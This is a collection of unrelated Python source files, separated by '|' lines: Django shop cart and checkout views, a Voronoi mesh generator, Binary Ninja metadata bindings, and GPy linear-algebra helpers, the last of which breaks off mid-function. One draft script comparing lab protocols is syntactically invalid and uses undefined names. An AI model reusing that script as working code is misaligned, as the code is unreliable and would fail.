item.delete()
codes = []
for code in cart.get_discount_codes():
codes.append(code.code)
code.delete()
for dc in DiscountCode.objects.filter(code__in=codes):
dc.use(-1)
return super(CartView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
code = form.cleaned_data.get('code', None)
if code and self.request.POST.get('validate', None):
msg = _('Discount code is valid.')
else:
if code:
form.save()
msg = _('Discount code has been applied successfully.')
else:
msg = _('Cart has been updated successfully.')
messages.success(self.request, msg)
if self.request.is_ajax():
return JsonResponse({'success': msg})
return redirect('shopit-cart')
def form_invalid(self, form):
if self.request.is_ajax():
return JsonResponse(dict(form.errors), status=400)
return super(CartView, self).form_invalid(form)
def get_form_kwargs(self):
kwargs = super(CartView, self).get_form_kwargs()
kwargs['cart'] = self.cart
return kwargs
@method_decorator(csrf_protect)
def post(self, request, *args, **kwargs):
for item, quantity in [x for x in request.POST.items() if x[0].startswith('quantity') and x[1]]:
item, quantity = int(item.split('-').pop()), int(quantity)
item = CartItem.objects.get(pk=item)
if quantity > 0:
available, diff = item.product.is_available(quantity)
if available:
item.quantity = quantity
else:
item.quantity = quantity + diff
item.save()
else:
item.delete()
self.update_cart()
return super(CartView, self).post(request, *args, **kwargs)
class WatchView(CartObjectMixin, TemplateView):
template_name = 'shopit/shop/watch.html'
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
return super(WatchView, self).dispatch(request, *args, **kwargs)
class CheckoutView(CartObjectMixin, FormView):
"""
Checkout view that handles customer selection forms and redirects to
purchase url of selected payment provider.
"""
template_name = 'shopit/shop/checkout.html'
def forms_valid(self, **forms):
"""
All the forms are valid, make the purchase happen. Return's JSON.
"""
forms['customer_form'].save()
self.cart.shipping_address = forms['shipping_form'].save()
self.cart.billing_address = forms['billing_form'].save()
self.cart.extra.update(forms['payment_form'].cleaned_data)
self.cart.extra.update(forms['delivery_form'].cleaned_data)
self.cart.extra.update(forms['extra_form'].cleaned_data)
self.update_cart()
self.cart.save()
for modifier in cart_modifiers_pool.get_payment_modifiers():
if modifier.is_active(self.cart):
payment_provider = getattr(modifier, 'payment_provider', None)
if payment_provider:
expression = payment_provider.get_payment_request(self.cart, self.request)
return JsonResponse({'expression': expression})
return HttpResponseBadRequest()
def forms_invalid(self, **forms):
self.cart.save()
errors = dict([('%s-%s' % (x.prefix, y[0]), y[1]) for x in forms.values() for y in x.errors.items()])
return JsonResponse(errors, status=400)
@method_decorator(never_cache)
def get(self, request, *args, **kwargs):
response = super(CheckoutView, self).get(request, *args, **kwargs)
return response if not self.cart.is_empty else redirect('shopit-cart')
def get_context_data(self, **kwargs):
context = {'view': self}
context.update(self.get_cart_data())
context.update(self.get_forms())
context.update(kwargs)
return context
def get_forms(self, **kwargs):
kwargs['request'] = self.request
kwargs['cart'] = self.cart
forms = {
'shipping_form': shop_forms.ShippingAddressForm(prefix='shipping', **kwargs),
'billing_form': shop_forms.BillingAddressForm(prefix='billing', **kwargs),
'payment_form': shop_forms.PaymentMethodForm(prefix='payment', **kwargs),
'delivery_form': shop_forms.DeliveryMethodForm(prefix='delivery', **kwargs),
'extra_form': shop_forms.ExtraAnnotationForm(prefix='extra', **kwargs),
'accept_form': shop_forms.AcceptConditionForm(prefix='accept', **kwargs),
}
if self.request.customer.is_registered():
forms['customer_form'] = shop_forms.CustomerForm(prefix='customer', **kwargs)
else:
forms['customer_form'] = shop_forms.GuestForm(prefix='guest', **kwargs)
return forms
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def post(self, request, *args, **kwargs):
"""
Ment to be accessed via ajax, since the `get_payment_request` method
from the payment provider returns a javascript expression that needs
to be evaluated within javascript.
"""
if not request.is_ajax():
return HttpResponseBadRequest()
forms = self.get_forms(data=request.POST)
if all([x.is_valid() for x in forms.values()]):
return self.forms_valid(**forms)
return self.forms_invalid(**forms)
class ThanksView(TemplateView):
"""
A generic thank you view, adds last updated order to the context,
redirects to cart if no order.
"""
template_name = 'shopit/shop/thanks.html'
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
self.order = Order.objects.filter_from_request(request).first()
if not self.order:
return redirect('shopit-cart')
return super(ThanksView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ThanksView, self).get_context_data(**kwargs)
context['order'] = self.order
return context
|
|
# Copyright 2016 Jochen Kursawe. See the LICENSE file at the top-level directory
# of this distribution and at https://github.com/kursawe/MCSTracker/blob/master/LICENSE.
import numpy as np
from ..core import *
from pyhull.voronoi import VoronoiTess # in maths type easy_install --user pyhull to make this work
def generate_random_tesselation(nx, ny, number_of_relaxation_steps = 4):
"""Generate a random tesselation of roughly nx times ny cells
Parameters
----------
nx : int
Approximate number of cells in x direction
ny : int
Approximate number of cells in y direction
number_of_relaxation_steps : int
In each relaxation step the centroids of the voronoi cells
are used as seeds for a new voronoi tesselation
Returns
-------
mesh : Mesh type
random mesh of dimension nx and ny
THIS DESCRIPTION NEEDS UPDATING, SEE CLASS DOCUMENTATION BELOW
This mesh generator will distribute random points in a plane of size
nx x ny and and create a voronoi tesselation from it. Then, number_of_relaxation_steps
relaxation steps will be applied. In each relaxation step, the centroids of all voronoi cells
will be collected and used as seeds for a new tesselation.
"""
mesh_generator = RandomTesselationGenerator(nx, ny, number_of_relaxation_steps)
return mesh_generator.generate_tesselation()
class RandomTesselationGenerator:
def __init__(self, nx, ny, number_of_relaxation_steps = 4):
"""A generator class for the generation of random tesslations.
For more detailed documentation of the input arguments see the
generate_random_tesselation function in this module
The constructor will not perform the voronoi tesselation and Lloyd relaxation.
To get the mesh call the function generate_tesselation() of this object.
"""
self.nx = nx
"""width of the sheet in x direction"""
self.ny = ny
"""width of the sheet in y direction"""
self.nx_with_dummies = nx + 8
""" We make the voronoi mesh bigger by 4 cells on each side in order
to avoid boundary effects in the mesh that we draw. This is then the
overall mesh dimension in x directions"""
self.ny_with_dummies = ny + 8
"""The overall mesh dimension in y direction"""
self.number_of_relaxation_steps = number_of_relaxation_steps
"""The number of voronoi relaxation steps that the generator should perform on the tesselation"""
self.current_mesh = None
"""after each iteration the generator will reset this internal variable"""
self.current_centroids = None
"""will be reset after each iteration"""
self.padding_centroid_positions = self.generate_padding_voronoi_centroids()
"""At each iteration, we put these additional centroids ad the outside of the mesh"""
self.voronoi_diagram = None
"""the full voronoi diagram after the current iteration"""
def generate_tesselation(self):
"""Generate and return the tesselation as prescribed by the arguments of the __init__() function
Returns
-------
random_mesh : Mesh type
a mesh object with based on random voronoi seeds of the requested size,
and where the requested number of Lloyd relaxation steps has been applied
"""
# First, we generate an initial tesselation. This is where the random seeds are made and the internal
# mesh variable are first written
self.generate_initial_tesselation()
# if the user does not request relaxation steps, just return this mesh
if ( self.number_of_relaxation_steps == 0 ):
# we need to crop the mesh before we return it, i.e. cut of the regions and cells that we added
# to hide boundary effects
return self.crop_and_return_mesh()
else:
# if relaxation steps are required we perform them
for iteration in range(self.number_of_relaxation_steps):
# get the centroids of the existing mesh
centroid_positions = []
for element in self.mesh.elements:
centroid_positions.append(element.calculate_centroid())
# add our padding centroids, i.e. two rows of regularly spaced centroids
# on the outside of the entire region of interest (which includes extra space and cells)
all_centroid_positions = np.vstack((np.array(centroid_positions),
self.padding_centroid_positions))
# We generate a Voronoi tesselation of that
self.voronoi_diagram = VoronoiTess(all_centroid_positions)
# now we clean up that voronoi tesselation and set the mesh in the generator
self.remove_padding_cells_from_voronoi_diagram_and_create_mesh()
# after we went through the iterations we can crop and return the mesh
return self.crop_and_return_mesh()
def crop_and_return_mesh(self):
"""We generated a (Lloyd relaxed) voronoi mesh that is larger than the requested mesh.
Here, we cut off all the extra cells
The method works by drawing a completely new mesh."""
# Let's make a list of new elements for the new mesh
new_elements = []
# a dictionary where keys are ids of old nodes and values are new nodes
# at the same position. New nodes are required because we currently don't have functionality to
# delete elements from nodes (shouldn't be difficult to implement, but also didn't seem necessary
# here)
node_dictionary = {}
for old_element in self.mesh.elements:
this_centroid = old_element.calculate_centroid()
# if this centroid is inside the box of interest, create an identical new element
if ( not( this_centroid[0] < 0.5 or this_centroid[0] > ( self.nx + 0.5 )
or this_centroid[1] < 0.5 or this_centroid[1] > (self.ny + 0.5) )):
new_element_nodes = []
for node in old_element.nodes:
if node.id not in node_dictionary:
# The new node has the same position as the old node
node_dictionary[node.id] = Node(node.position)
new_element_nodes.append(node_dictionary[node.id])
new_elements.append(Element(new_element_nodes))
return Mesh(node_dictionary.values(), new_elements)
def generate_initial_tesselation(self):
"""Generate the initial tesselation.
In this method we distribute nx_with_dummies*ny_with_dummies points randomly in a box of
dimension [nx_with_dummies, ny_with_dummies]. We then add the padding centroids on the outside
of the box to `cut of' infinity. Finally, we take the voronoi tesselation of all these centroids,
and remove the voronoi cells originating from the padding centroids from this tesselation.
This is designed such that the average area of the remaining cells should be one.
"""
total_number_of_random_points_to_create = np.prod(self.nx_with_dummies * self.ny_with_dummies)
# We make a mesh of cell centroids.
# First we get an array with random entries between 0 and 1 in x and y directions of correct length
centroid_positions = np.random.rand(total_number_of_random_points_to_create, 2)
# Then we blow this array up to the correct dimensions in x and y
centroid_positions[:,0] *= self.nx_with_dummies
centroid_positions[:,1] *= self.ny_with_dummies
# and we shift the mesh such that the bottom and left added space is negative
centroid_positions[:,0] -= 3.5
centroid_positions[:,1] -= 3.5
# the region with the centroids now spreads from -3.5 to (self.[nx/ny] + 4.5) so that we can add padding
# cells at integer coordinates, i.e -4 and self.[nx/ny] + 5
# Now we add some padding cells on the outside.
centroid_positions = np.vstack((centroid_positions, self.padding_centroid_positions))
# We generate a Voronoi tesselation of that
self.voronoi_diagram = VoronoiTess(centroid_positions)
# now we clean up this voronoi tesselation and set the mesh of the generator
# cleaning up means we remove the voronoi cells originating from the padding seeds
self.remove_padding_cells_from_voronoi_diagram_and_create_mesh()
def remove_padding_cells_from_voronoi_diagram_and_create_mesh(self):
"""This function interrogates the internal voronoi_diagram and creates a Mesh class object instance from it.
This mesh will not include the cells that were added for padding to cut off infinity.
"""
# Let's get all vertices
all_vertices = np.array(self.voronoi_diagram.vertices)
# and all regions
all_regions = self.voronoi_diagram.regions
# now, let's make a new array of vertices and a new array of regions
new_vertices = []
new_elements = []
index_map = [-1]*all_vertices.shape[0]
current_number_of_new_vertices = 0
# Loop over all regions and filter all regions that come from the dummy indices
# this relies on the voronoi diagram indexing the regions and voronoi points in the same order
for region_index, voronoi_centre in enumerate(self.voronoi_diagram.points):
# if this voronoi centre is inside the box (including the dummies)
if ( not( voronoi_centre[0] < -3.5 or voronoi_centre[0] > self.nx + 4 + 0.5
or voronoi_centre[1] < -3.5 or voronoi_centre[1] > self.ny + 4 + 0.5 )):
new_region = []
for vertex_index in self.voronoi_diagram.regions[region_index]:
# if the index is not in the new vertices, add it
if (index_map[vertex_index] == -1):
this_node = Node(all_vertices[vertex_index])
new_vertices.append(this_node)
index_map[vertex_index] = current_number_of_new_vertices
# and add it to the new region
new_region.append(this_node)
current_number_of_new_vertices += 1
else:
# if it is in the new vertices though then add
# the right vertex to the new region
new_region.append(new_vertices[index_map[vertex_index]])
# lets make an element from that region and add it to the list of elements
this_element = Element(new_region)
new_elements.append(this_element)
# ensure that all the vertices in each element are ordered counterclockwise
for element in new_elements:
area = element.calculate_area()
if area < 0:
element.nodes.reverse()
# now we have made all the nodes and elements for the mesh, and associated them.
# Time to generate the mesh and set the member variable for further processing
self.mesh = Mesh(new_vertices, new_elements)
def generate_padding_voronoi_centroids(self):
"""Generate 2 rows or colomns on all sides of the nx_with_dummies x ny_with_dummies grid to seal
the voronoi tesselation from infinity.
The returned centroids will form two rows around the grid, the inner row
will have integer coordinates, the outer row will be shifted by 0.5 in x direction
on the top and the bottom, and shifted by 0.5 in y direction on the left and the right.
Parameters
----------
nx : size of the grid in x direction
ny : size of the grid in y direction
Returns
-------
padding_centroids : numpy array
list of centroids of the points making up the padding.
"""
# 2 extra rows of cells at the top
x_positions = np.arange( -5, self.nx + 7 )
top_row_one = np.zeros( ( self.nx_with_dummies + 4, 2 ) )
top_row_one[:, 0] = x_positions
top_row_one[:, 1] = self.ny + 5
top_row_two = np.zeros( ( self.nx_with_dummies + 4 + 1, 2 ) )
top_row_two[:,1] = self.ny + 6
top_row_two[1:, 0] = (x_positions + 0.5)
top_row_two[0, 0] = -5.5
# 2 extra rows of cells at the bottom
bottom_row_one = np.zeros( ( self.nx_with_dummies + 4, 2 ) )
bottom_row_one[:, 0] = x_positions
bottom_row_one[:, 1] = - 4
bottom_row_two = np.zeros( ( self.nx_with_dummies + 4 + 1, 2 ) )
bottom_row_two[:, 1] = - 5
bottom_row_two[1:, 0] = (x_positions + 0.5)
bottom_row_two[0,0] = -5.5
# 2 extra rows left
y_positions = np.arange( -3 , self.ny + 5 )
left_row_one = np.zeros( ( self.ny_with_dummies , 2 ) )
left_row_one[:,1] = y_positions
left_row_one[:,0] = -4
left_row_two = np.zeros( ( self.ny_with_dummies + 1, 2) )
left_row_two[1:, 1] = y_positions + 0.5
left_row_two[0, 1] = -4.5
left_row_two[:, 0] = -5
# and 2 extra rows on the right
right_row_one = np.zeros( ( self.ny_with_dummies , 2) )
right_row_one[:,1] = y_positions
right_row_one[:,0] = self.nx + 5
right_row_two = np.zeros( ( self.ny_with_dummies + 1, 2) )
right_row_two[1:, 1] = y_positions + 0.5
right_row_two[0, 1] = - 4.5
right_row_two[:, 0] = self.nx + 6
all_padding_centroids = np.vstack((right_row_one, right_row_two,
left_row_one, left_row_two,
bottom_row_one, bottom_row_two,
top_row_one, top_row_two))
return all_padding_centroids
|
|
import pygraphviz as *
from protocols.models import Protocol
def compare_protocols(protocol_A,protocol_B):
'''compare two protocols side by side
both protocols come from the same template
no complex diff, only layout
'''
import pygraphviz as *
from protocols.models import Protocol
reagent_verbs = ['add', 'combine']
machine_verbs = ['heat', 'chill', 'centrifuge', 'spin']
try:
protA = Protocol.objects.get(name__icontains=protocol_A)
protB = Protocol.objects.get(name__icontains=protocol_B)
except: # fix to ObjectDoesNotExsist
return 'not in DB, try again'
# are the action trees identical?
# confirm action_tree lengths before starting main compare loop:
NUM_ACTIONS = len(protA.get_action_tree())
actions_A = protA.get_action_tree()
actions_B = protB.get_action_tree()
if len(actionsA) == len (actionsB):
continue
else:
return 'protocols dont have the same length'
'''score is accumulated through the compare:
If all action sequences are the same: actions = 1, else, actions = 0 will deal with later
If all attribute keys per action are the same: attribute_keys = 1, else: attribute_keys = similar/total.
If all attribute values pe action are the same: attribute_values = 1, else: attribute_values = similar/total.
if the verb of the action is the same, the output will look like
[step_num, action_num, verb_a[objectid], verb_b[objectid], attribute_key_score, attribute_value_score]
attribute compare:
if all attribute_keys are the same:
if verb is add or combine:
compare the reagent lists:
'''
# Start main loop:
for i in NUM_ACTIONS:
if actions_A[i][2] == actions_B[i][2]: # verb name is the same
if actions_A[i][2] in reagent_verbs:
rank = compare_reagents(actions_A[i], actions_B[i])
if actions_A[i][2] in machine_verbs:
rank = compare_machines(actions_A[i], actions_B[i])
def compare_reagents(location_A, location_B):
# check if both have a component - list:
a = protA.steps[location_A[0]]['actions'][location_A[1]]
b = protB.steps[location_B[0]]['actions'][location_B[1]]
if 'component - list' in a.keys() and 'component - list' in b.keys():
# get components lists:
ar = [a['component - list'][r]['reagent_name'] for r in range(len(a['component - list']))]
br = [b['component - list'][r]['reagent_name'] for r in range(len(b['component - list']))]
# compare reagent names
diff_name = ar.symmetric_difference(br)
same_name = ar.intersection(br)
# compare reagent supplier
# compare
# compare reagent concentrations
# compare reagent volumes
# compare reagent quantities
# # find different keys():
# a = set(protA.steps[actions_A[i][0]]['actions'][actions_A[i][1]].keys())
# b = set(protB.steps[actions_B[i][0]]['actions'][actions_B[i][1]].keys())
# if len(a.symmetric_difference(b)) == 0:
# # no key difference, move to values difference
# for i in a:
# if type(a) ==unicode and type(b) == unicode:
# if a[i] == b[i]
# loop through actions:
# find verb-type compatabilites
# determine what type of verb it is: component or machine.
# if both match verb - type make a dim connector add both to the same rank
# identifying an edge:
# (a.nodes('oy38e9')['verb'],a.nodes('oy38e9')['verb'])
# if they differ in key numbers, change the color of the square
# compare both children:
# if they match, color both verbs in green
# if they dont, display both, with red highliting the diff and green the black the same
a.
a_actions = [r[2] for r in a.get_action_tree('objectid')]
b_actions = [r[2] for r in b.get_action_tree('objectid')]
comparator = []
for idxa in a_actions:
# comparators:
# name
# type of child
# younger brother
# older sister
a_name = a.nodes[idxa]['verb']
if 'machines' in a.nodes[idxa]['verb'].keys():
a_type = 'machine'
a_child = a.nodes[idxa]['machine']['objectid']
else:
a_type_comparator = 'components'
a_child = a.nodes[idxa]['components']['objectid']
a_parent = a.nodes[idxa].parent['objectid'] # pointer to the step object
idx_of_a = actions_a.index(idxa)
if idx_of_a == 0:
a_previous = None
a_next = 1
# if idx_of_a == 1:
# a_previous = 0
# a_next = [2,3]
if idx_of_a == len(a_actions):
a_previous = len(a_actions)-1#, len(a_actions)-2]
a_next = None
# if idx_of_a == len(a_actions)-1:
# a_previous = [len(a_actions)-2, len(a_actions)-3]
# a_next = idx_of_a +1
else:
a_previous = idx_of_a - 1#, idx_of_self - 2]
a_next = idx_of_a + 1#, idx_of_self + 2]
for idxb in b_actions:
b_name = a.nodes[idxb]['verb']
if 'machines' in b.nodes[idxb]['verb'].keys():
b_type = 'machine'
b_child = b.nodes[idxb]['machine']['objectid']
else:
b_type_comparator = 'components'
b_child = b.nodes[idxb]['components']['objectid']
b_parent = b.nodes[idxb].parent['objectid'] # pointer to the step object
idx_of_b = b_actions.index(idxb)
if idx_of_b == 0:
b_previous = None
b_next = 1#,2]
# if idx_of_b == 1:
# b_previous = 0
# b_next = [2,3]
if idx_of_b == len(b_actions):
b_previous = len(b_actions)-1#, len(b_actions)-2]
b_next = None
# if idx_of_b == len(b_actions)-1:
# b_previous = [len(b_actions)-2, len(b_actions)-3]
# b_next = idx_of_b +1
else:
b_previous = idx_of_b - 1#, idx_of_b - 2]
b_next = idx_of_b + 1#, idx_of_b + 2]
# compare the edge content:
if a_name == b_name and a_type == b_type:
edges = True
else:
edges = False
#if a_type == b_type:
# call an action to compare the contents of both.
# comapre relatives:
if a.nodes[a_actions[a_previous]]['name'] == b.nodes[b_actions[b_previous]]['name']:
previous = True
else:
previous = False
if a.nodes[a_actions[a_next]]['name'] == b.nodes[b_actions[b_next]]['name']:
next = True
else:
next = False
if edges == True and previous ==True and next == True:
comparator.append([idxa, idxb, 3])
if edges == True and previous == True:
comparator.append([idxa, idxb, 0])
if edges == True and next == True:
comparator.append([idxa, idxb, 1])
|
|
# Copyright (c) 2015-2021 Vector 35 Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from __future__ import absolute_import
import ctypes
# Binary Ninja components
from binaryninja import _binaryninjacore as core
from binaryninja.enums import MetadataType
# 2-3 compatibility
from binaryninja import range
from binaryninja import pyNativeStr
import numbers
class Metadata(object):
def __init__(self, value=None, signed=None, raw=None, handle=None):
if handle is not None:
self.handle = handle
elif isinstance(value, numbers.Integral):
if signed:
self.handle = core.BNCreateMetadataSignedIntegerData(value)
else:
self.handle = core.BNCreateMetadataUnsignedIntegerData(value)
elif isinstance(value, bool):
self.handle = core.BNCreateMetadataBooleanData(value)
elif isinstance(value, (str, bytes)):
if raw:
if isinstance(value, str):
value = bytes(bytearray(ord(i) for i in value))
buffer = (ctypes.c_ubyte * len(value)).from_buffer_copy(value)
self.handle = core.BNCreateMetadataRawData(buffer, len(value))
else:
self.handle = core.BNCreateMetadataStringData(value)
elif isinstance(value, float):
self.handle = core.BNCreateMetadataDoubleData(value)
elif isinstance(value, (list, tuple)):
self.handle = core.BNCreateMetadataOfType(MetadataType.ArrayDataType)
for elm in value:
md = Metadata(elm, signed, raw)
core.BNMetadataArrayAppend(self.handle, md.handle)
elif isinstance(value, dict):
self.handle = core.BNCreateMetadataOfType(MetadataType.KeyValueDataType)
for elm in value:
md = Metadata(value[elm], signed, raw)
core.BNMetadataSetValueForKey(self.handle, str(elm), md.handle)
else:
raise ValueError("{} doesn't contain type of: int, bool, str, float, list, dict".format(type(value).__name__))
def __len__(self):
if self.is_array or self.is_dict or self.is_string or self.is_raw:
return core.BNMetadataSize(self.handle)
raise Exception("Metadata object doesn't support len()")
def __eq__(self, other):
if isinstance(other, int) and self.is_integer:
return int(self) == other
elif isinstance(other, str) and (self.is_string or self.is_raw):
return str(self) == other
elif isinstance(other, float) and self.is_float:
return float(self) == other
elif isinstance(other, bool) and self.is_boolean:
return bool(self) == other
elif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):
if len(self) != len(other):
return False
for a, b in zip(self, other):
if a != b:
return False
return True
elif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):
if len(self) != len(other):
return False
for a, b in zip(self, other):
if a != b or self[a] != other[b]:
return False
return True
elif isinstance(other, Metadata) and self.is_integer and other.is_integer:
return int(self) == int(other)
elif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):
return str(self) == str(other)
elif isinstance(other, Metadata) and self.is_float and other.is_float:
return float(self) == float(other)
elif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:
return bool(self) == bool(other)
return NotImplemented
def __ne__(self, other):
if isinstance(other, int) and self.is_integer:
return int(self) != other
elif isinstance(other, str) and (self.is_string or self.is_raw):
return str(self) != other
elif isinstance(other, float) and self.is_float:
return float(self) != other
elif isinstance(other, bool):
return bool(self) != other
elif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):
if len(self) != len(other):
return True
areEqual = True
for a, b in zip(self, other):
if a != b:
areEqual = False
return not areEqual
elif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):
if len(self) != len(other):
return True
for a, b in zip(self, other):
if a != b or self[a] != other[b]:
return True
return False
elif isinstance(other, Metadata) and self.is_integer and other.is_integer:
return int(self) != int(other)
elif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):
return str(self) != str(other)
elif isinstance(other, Metadata) and self.is_float and other.is_float:
return float(self) != float(other)
elif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:
return bool(self) != bool(other)
return NotImplemented
def __iter__(self):
if self.is_array:
for i in range(core.BNMetadataSize(self.handle)):
yield Metadata(handle=core.BNMetadataGetForIndex(self.handle, i)).value
elif self.is_dict:
result = core.BNMetadataGetValueStore(self.handle)
try:
for i in range(result.contents.size):
if isinstance(result.contents.keys[i], bytes):
yield str(pyNativeStr(result.contents.keys[i]))
else:
yield result.contents.keys[i]
finally:
core.BNFreeMetadataValueStore(result)
else:
raise Exception("Metadata object doesn't support iteration")
def __getitem__(self, value):
if self.is_array:
if not isinstance(value, int):
raise ValueError("Metadata object only supports integers for indexing")
if value >= len(self):
raise IndexError("Index value out of range")
return Metadata(handle=core.BNMetadataGetForIndex(self.handle, value)).value
if self.is_dict:
if not isinstance(value, str):
raise ValueError("Metadata object only supports strings for indexing")
handle = core.BNMetadataGetForKey(self.handle, value)
if handle is None:
raise KeyError(value)
return Metadata(handle=handle).value
raise NotImplementedError("Metadata object doesn't support indexing")
def __str__(self):
if self.is_string:
return str(core.BNMetadataGetString(self.handle))
if self.is_raw:
length = ctypes.c_ulonglong()
length.value = 0
native_list = core.BNMetadataGetRaw(self.handle, ctypes.byref(length))
out_list = []
for i in range(length.value):
out_list.append(native_list[i])
core.BNFreeMetadataRaw(native_list)
return ''.join(chr(a) for a in out_list)
raise ValueError("Metadata object not a string or raw type")
def __bytes__(self):
return bytes(bytearray(ord(i) for i in self.__str__()))
def __int__(self):
if self.is_signed_integer:
return core.BNMetadataGetSignedInteger(self.handle)
if self.is_unsigned_integer:
return core.BNMetadataGetUnsignedInteger(self.handle)
raise ValueError("Metadata object not of integer type")
def __float__(self):
if not self.is_float:
raise ValueError("Metadata object is not float type")
return core.BNMetadataGetDouble(self.handle)
def __nonzero__(self):
if not self.is_boolean:
raise ValueError("Metadata object is not boolean type")
return core.BNMetadataGetBoolean(self.handle)
@property
def value(self):
if self.is_integer:
return int(self)
elif self.is_string:
return str(self)
elif self.is_raw:
return bytes(self)
elif self.is_float:
return float(self)
elif self.is_boolean:
return bool(self)
elif self.is_array:
return list(self)
elif self.is_dict:
return self.get_dict()
raise TypeError()
def get_dict(self):
if not self.is_dict:
raise TypeError()
result = {}
for key in self:
result[key] = self[key]
return result
@property
def type(self):
return MetadataType(core.BNMetadataGetType(self.handle))
@property
def is_integer(self):
return self.is_signed_integer or self.is_unsigned_integer
@property
def is_signed_integer(self):
return core.BNMetadataIsSignedInteger(self.handle)
@property
def is_unsigned_integer(self):
return core.BNMetadataIsUnsignedInteger(self.handle)
@property
def is_float(self):
return core.BNMetadataIsDouble(self.handle)
@property
def is_boolean(self):
return core.BNMetadataIsBoolean(self.handle)
@property
def is_string(self):
return core.BNMetadataIsString(self.handle)
@property
def is_raw(self):
return core.BNMetadataIsRaw(self.handle)
@property
def is_array(self):
return core.BNMetadataIsArray(self.handle)
@property
def is_dict(self):
return core.BNMetadataIsKeyValueStore(self.handle)
def remove(self, key_or_index):
if isinstance(key_or_index, str) and self.is_dict:
core.BNMetadataRemoveKey(self.handle, key_or_index)
elif isinstance(key_or_index, int) and self.is_array:
core.BNMetadataRemoveIndex(self.handle, key_or_index)
else:
raise TypeError("remove only valid for dict and array objects")
|
|
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
# tdot function courtesy of Ian Murray:
# Iain Murray, April 2013. iain contactable via iainmurray.net
# http://homepages.inf.ed.ac.uk/imurray2/code/tdot/tdot.py
import numpy as np
from scipy import linalg
from scipy.linalg import lapack, blas
from .config import config
import logging
try:
from . import linalg_cython
config.set('cython', 'working', 'True')
except ImportError:
config.set('cython', 'working', 'False')
def force_F_ordered_symmetric(A):
"""
return a F ordered version of A, assuming A is symmetric
"""
if A.flags['F_CONTIGUOUS']:
return A
if A.flags['C_CONTIGUOUS']:
return A.T
else:
return np.asfortranarray(A)
def force_F_ordered(A):
"""
return a F ordered version of A, assuming A is triangular
"""
if A.flags['F_CONTIGUOUS']:
return A
print("why are your arrays not F order?")
return np.asfortranarray(A)
# def jitchol(A, maxtries=5):
# A = force_F_ordered_symmetric(A)
# L, info = lapack.dpotrf(A, lower=1)
# if info == 0:
# return L
# else:
# if maxtries==0:
# raise linalg.LinAlgError, "not positive definite, even with jitter."
# diagA = np.diag(A)
# if np.any(diagA <= 0.):
# raise linalg.LinAlgError, "not pd: non-positive diagonal elements"
# jitter = diagA.mean() * 1e-6
# return jitchol(A+np.eye(A.shape[0])*jitter, maxtries-1)
def jitchol(A, maxtries=5):
A = np.ascontiguousarray(A)
L, info = lapack.dpotrf(A, lower=1)
if info == 0:
return L
else:
diagA = np.diag(A)
if np.any(diagA <= 0.):
raise linalg.LinAlgError("not pd: non-positive diagonal elements")
jitter = diagA.mean() * 1e-6
num_tries = 1
while num_tries <= maxtries and np.isfinite(jitter):
try:
L = linalg.cholesky(A + np.eye(A.shape[0]) * jitter, lower=True)
return L
except:
jitter *= 10
finally:
num_tries += 1
raise linalg.LinAlgError("not positive definite, even with jitter.")
import traceback
try: raise
except:
logging.warning('\n'.join(['Added jitter of {:.10e}'.format(jitter),
' in '+traceback.format_list(traceback.extract_stack(limit=2)[-2:-1])[0][2:]]))
return L
# def dtrtri(L, lower=1):
# """
# Wrapper for lapack dtrtri function
# Inverse of L
#
# :param L: Triangular Matrix L
# :param lower: is matrix lower (true) or upper (false)
# :returns: Li, info
# """
# L = force_F_ordered(L)
# return lapack.dtrtri(L, lower=lower)
def dtrtrs(A, B, lower=1, trans=0, unitdiag=0):
"""
Wrapper for lapack dtrtrs function
DTRTRS solves a triangular system of the form
A * X = B or A**T * X = B,
where A is a triangular matrix of order N, and B is an N-by-NRHS
matrix. A check is made to verify that A is nonsingular.
:param A: Matrix A(triangular)
:param B: Matrix B
:param lower: is matrix lower (true) or upper (false)
:returns: Solution to A * X = B or A**T * X = B
"""
A = np.asfortranarray(A)
#Note: B does not seem to need to be F ordered!
return lapack.dtrtrs(A, B, lower=lower, trans=trans, unitdiag=unitdiag)
def dpotrs(A, B, lower=1):
"""
Wrapper for lapack dpotrs function
:param A: Matrix A
:param B: Matrix B
:param lower: is matrix lower (true) or upper (false)
:returns:
"""
A = force_F_ordered(A)
return lapack.dpotrs(A, B, lower=lower)
def dpotri(A, lower=1):
"""
Wrapper for lapack dpotri function
DPOTRI - compute the inverse of a real symmetric positive
definite matrix A using the Cholesky factorization A =
U**T*U or A = L*L**T computed by DPOTRF
:param A: Matrix A
:param lower: is matrix lower (true) or upper (false)
:returns: A inverse
"""
A = force_F_ordered(A)
R, info = lapack.dpotri(A, lower=lower) #needs to be zero here, seems to be a scipy bug
symmetrify(R)
return R, info
def pddet(A):
"""
